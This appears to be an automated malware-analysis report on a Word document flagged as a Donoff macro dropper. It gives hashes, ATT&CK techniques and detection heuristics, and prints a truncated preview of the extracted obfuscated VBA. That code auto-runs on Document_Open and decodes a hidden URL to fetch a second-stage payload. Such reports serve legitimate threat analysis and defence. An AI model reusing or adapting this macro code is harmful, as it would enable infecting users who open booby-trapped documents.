Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 182ac5d9689be1c1…

MALICIOUS

Office (OLE)

Size: 100.0 KB | Created: 2016-05-31 22:19:00 | Authoring application: Microsoft Office Word | First seen: 2017-12-09
MD5: 1254fbf55483c9f4ec2daf0fe2cbe246
SHA-1: 1b728a40a4c2fbaab697ee2ba8875fd9ad4dbfd3
SHA-256: 182ac5d9689be1c1169e1ccf08eca6f4f745104b7ef665344fceb3acba229d10
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a malicious OLE document containing VBA macros. The 'Document_Open' macro, along with 'CreateObject' and 'CallByName' calls, indicates an attempt to execute code upon opening. The ClamAV detection 'Doc.Dropper.Donoff-5743527-0' strongly suggests this is a dropper malware. The VBA code is heavily obfuscated, but the presence of these indicators points to a malicious dropper designed to download and execute a secondary payload.

Heuristics (7)

  • ClamAV: Doc.Dropper.Donoff-5743527-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/drawingml/2006/main (In document text (OLE body))
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography (In document text (OLE body))
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml (In document text (OLE body))

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas | Kind: vba-macro | Source: oletools.olevba.extract_macros (decoded VBA source) | Size: 18353 bytes
SHA-256: a134f23ee10b07b941b8d1f1bce4d644cddcf932374d943a91c1d43e0b99baa3
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub lkswGSHNVuTAQ(ByVal omQZrkiVPngMZw As String, ByVal peoQWzJfdX As Integer)
VIfjXBzOOIOwxo True, "rLuIztlckEAe", 9044
bkgCuZoYdtPvT "brfqXBb1FG", "xXmt6cN1sdjN"
JGtAgsTnoqG
lCPTKRZExOo = 6741
If UmgYc("CubvvVU1AS", 886, 440) Then
cmmRVObVQe = 9024
ftWCW
drTbEZVgssazF 1883
miEyuzJOiITog = 3192
TYGwFzqKih "du1M2Yb8LO5"
OtEHtGvFpsmxw = "Cb753mIufhHfKj"
Else
eVotAb 653, 5024, 4694
HOoHlL "0EU7OPKnWOQBp", 9258
hxqbWrAyD
JrrWDfLp = False
End If
End Sub
Private Sub EZkcFRxnRjouTl(ByVal MuSLxrZ As Integer)
cvXQJPIOxxe "0p3GOHg9GAjBUDK", "lWCFr4ovNAL", "lUxS5dTIL"
EymBSI = 358
iDOTKcGepkOAeE
sCAHDhUqizd = "m2uYSx9r57x6CV"
If DzPrxDwcLEKWX(True, 55, True) Then
mLVGipakLwl = 4069
mWyBxJiVQ 555, "sJ3EJMvxKjvUFs", 2131
uGzOfaOdNBuW = "wXPe1c1QiWNfYg"
aBYsyTlLOxb
Else
wiXEZX
JSzAaGnyj 9355
gNLfZVRnimxxR = "3CSAuj8FKvsfJJ"
End If
End Sub
Private Sub Document_Open()
Dim fUavOXs As Integer
Dim ysvMDfdzG As Boolean
QljCDRAhYYJeK.VMrLsxqGWZhW
End Sub

Attribute VB_Name = "QljCDRAhYYJeK"
Private Sub PbzYzSnrytYs(ByVal QvhDTEOB As String, ByVal iABgsQUWuywQ As String)
AcYriFBAyXe "a6uOKc4W0jRot2"
nFuWiLofk = "AsOckSqPD99m"
MQlLJrJaJGmdyr "9mOnOm196xOk", "dulLa7Po3jozWL", True
End Sub
Private Sub wpPBaZlNg(ByVal OdhAsRdvKl As Integer, ByVal UdqvvCAKEHp As String)
qKKygiydbcpeHi 3110
FzuUMcZI = 6371
CamHpqofVQJtzq "ZvNzbYqJZJ1yO", "7O9YXtkGHRbC"
faLwgw = True
FxGyLJvXkDuXnm
End Sub
Private Sub CjzNnDnizcfDgX(ByVal fbBDpNgzD As String, ByVal yXbTmGSHZZEzUu As Boolean)
okVkXeIkJG
WspbhijATvOQnh
XoYDn
End Sub
Public Function vtJeRYrx(ByVal uNHgaheI As String, ByVal vpXcp As String) As Object
Dim QQACfBvnEL As Integer
Dim iYKQhSBvjnh As String
Set vtJeRYrx = UTgowUeRVo(CreateObject(uNHgaheI))
End Function
Public Sub VMrLsxqGWZhW()
Dim IAgTLGtVXy As String
Dim vOGRlLXd As Integer
On Error GoTo irqbbTdEaF
VWPRmiQm.ycjedji
VWPRmiQm.MCubUOGGpxO
KevtNctmqcnMPu
Exit Sub
irqbbTdEaF:
End Sub
Private Sub UJtyIdEHGgj(ByVal cynhCXtpuZ As String)
EyvlKVzYsFu = "MZzFvjMhG"
If TTaCzGlAULM Then
NqrcviW False, "1J7m64CfrsIAs"
SCSazX
OfGfjkCHRKg True
Else
DIgpVqxKez 2123
End If
DVDZuspk "omWl6LySYh", 972
End Sub
Private Function UTgowUeRVo(ByVal tNaSQ As Object) As Object
Dim YBEMFJns As Integer
Set UTgowUeRVo = tNaSQ
End Function
Private Sub EoGcJRDhX(ByVal ugUysMpMUOif As String, ByVal LWMEHeWYA As String, ByVal cjiLQGcJHG As String)
Set MUSpHmv = NPueVrFYLnjLh.ppnPuwNle(True, cjiLQGcJHG)
NPueVrFYLnjLh.WnJKbAfDLckP KeWRwAnEnFR, 2670, "8aobfhvxYQM", MUSpHmv
JCyeWXOiyKhqyn.ZfIDrxSj cagYBeiSN.BfgxxHh(ndkhuPNeKaHRXK, MUSpHmv, 8879), False, "VSl6YUeDfo", ugUysMpMUOif
End Sub
Private Sub KevtNctmqcnMPu()
Dim YUqAlGJK As Boolean
EoGcJRDhX JCyeWXOiyKhqyn.GKbsdtedofVe, "uNlQmvYTMgvpWz", EOdsVSPnuYTLt
JCyeWXOiyKhqyn.FeZivkODwFK False, 618, JCyeWXOiyKhqyn.GKbsdtedofVe
End Sub
Private Function KeWRwAnEnFR() As String
KeWRwAnEnFR = oGDphuZ.GduvfnbzJkCRA("Cza4Inz'tM ZPdo4w4nzIlJoMad3I b1i3PnzarMyZM f4JiJleZ", "PJzM13:I4Z")
End Function
Private Function ndkhuPNeKaHRXK() As String
ndkhuPNeKaHRXK = oGDphuZ.GduvfnbzJkCRA("kR3esv0p5onTvsDeBT5okdyA", "Dv5Tw4r3Ak0")
End Function
Private Function EOdsVSPnuYTLt() As String
EOdsVSPnuYTLt = oGDphuZ.GduvfnbzJkCRA("6hMttvp6v:u//Mbn6riGnt6caurUnt.nvcovGm/nbMUr6it6Ust6a6rn/uovvffuiucuUe1Un2.66dUat6av", "6nUMGuv")
End Function

Attribute VB_Name = "oGDphuZ"
Private Function OabmIabiHpIOX(ByVal dWXqRYKkmZr As Integer, ByVal tsXIcBJwI As Integer, ByVal LUYteSeZzx As String, ByVal rvPMoqpvdb As String) As String
If Not kaShcLt.cKVuqwbFwPxEo(rvPMoqpvdb, False, False, LUYteSeZzx) Then
OabmIabiHpIOX = rvPMoqpvdb
End If
End Function
Private Function qCXcVwnCKhP(ByVal wJXruvwcaAXl As String) As String
wbhMqFiLIuXxUH
krKOU = False
lHIEk
qCXcVwnC
... (truncated)